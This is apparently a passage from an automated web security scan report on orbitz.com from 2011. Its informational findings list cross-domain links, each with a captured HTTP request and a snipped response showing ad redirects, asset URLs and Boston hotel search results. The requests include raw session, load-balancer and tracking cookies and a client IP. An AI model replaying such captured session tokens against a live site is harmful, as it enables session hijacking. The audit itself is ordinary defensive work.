Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 934
Date: Mon, 03 Oct 2011 00:07:36 GMT
Cache-Control: private
Content-Length: 934

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81442&AdID=270945&TargetID=37188&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14865,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37188,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66791,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dorbitz-price-assurance%26cnt%3DOVI%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PriceAssurance-OnlyOrbitz-NEW_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.234. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=2 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 890
Date: Mon, 03 Oct 2011 00:07:24 GMT
Cache-Control: private
Content-Length: 890

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81438&AdID=270694&TargetID=37184&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14862,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37184,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66788,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dvegasvacation%26cnt%3DPKH%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/ORB_cs_LasVegas-LastMinute_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.235. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shared/adserverProxy.jsp?tab=4 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 849
Date: Mon, 03 Oct 2011 00:34:03 GMT
Cache-Control: private
Content-Length: 849

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81441&AdID=274358&TargetID=37187&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14864,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37187,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66790,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fcruises.orbitz.com%2Fpromotion%2Fcruise-event.do"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/crs/ORB_FallSale_0908-0930_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...
19.236. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=5 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 921
Date: Mon, 03 Oct 2011 00:34:08 GMT
Cache-Control: private
Content-Length: 921

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81442&AdID=270945&TargetID=37188&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14865,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37188,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66791,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dorbitz-price-assurance%26cnt%3DOVI%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PriceAssurance-OnlyOrbitz-NEW_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.237. http://www.orbitz.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMzI1NDY3fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=orbitz.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 243900


...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotels/United_States--MA/Boston/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/style/global/printAll.css" media="print">
               <!--[if IE 6]>
...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/results/telesales/ORB_Telesales_StalkBar-1.png" alt="Call us to book 1-800-733-1297" height="58" width="160" />
    </div>
...[SNIP]...
bitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=OVI" class="link" data-agent="{
       &#034;type&#034;:&#034;PopupWindow&#034;
       
   }" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchBar/marketing/ORB_Hotel_Marketing_Banner-1.png" alt="" height="29" width="960" class="searchBarBanner" />
    </a>
...[SNIP]...
earch&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.page=1&hsv.location=11231" class="resetLocation link" delegatedtracking="true"> <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/remove/extraSmall/extraSmall-1.png" alt="Remove" height="9" width="9" />
    </a>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="starRating" />
   
                                       (7)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="starRating" />
   
                                       (36)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="starRating" />
   
                                       (87)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="starRating" />
   
                                       (37)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="starRating" />
   
                                       (4)</span>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=319853&hotel.hkey=319853_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/853/319853/W-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=50080&hotel.hkey=50080_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/080/50080/Super-8-WeymouthBoston-Area-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=4701&hotel.hkey=4701_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/701/4701/The-Westin-Waltham-Boston-Hotel-Exterior-3.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=317971&hotel.hkey=317971_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/971/317971/Crowne-Plaza-Hotel-BOSTON-NEWTON-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=206519&hotel.hkey=206519_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/519/206519/Hampton-Inn-Boston-Norwood-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=16123&hotel.hkey=16123_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/123/16123/Hilton-BostonDedham-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=36216&hotel.hkey=36216_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/216/36216/Residence-Inn-by-Marriott-Boston-North-ShoreDanvers-Hotel-Exterior-1-20110805-212119-014.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=7222&hotel.hkey=7222_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/222/7222/Hampton-Inn-BostonLogan-Airport-Hotel-Exterior-41.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=769&hotel.hkey=769_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/769/769/Boston-Marriott-Peabody-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=65358&hotel.hkey=65358_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/358/65358/Candlewood-Suites-BOSTON-BURLINGTON-Hotel-Exterior-4.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=126302&hotel.hkey=126302_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/302/126302/Homestead-Boston-Waltham-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
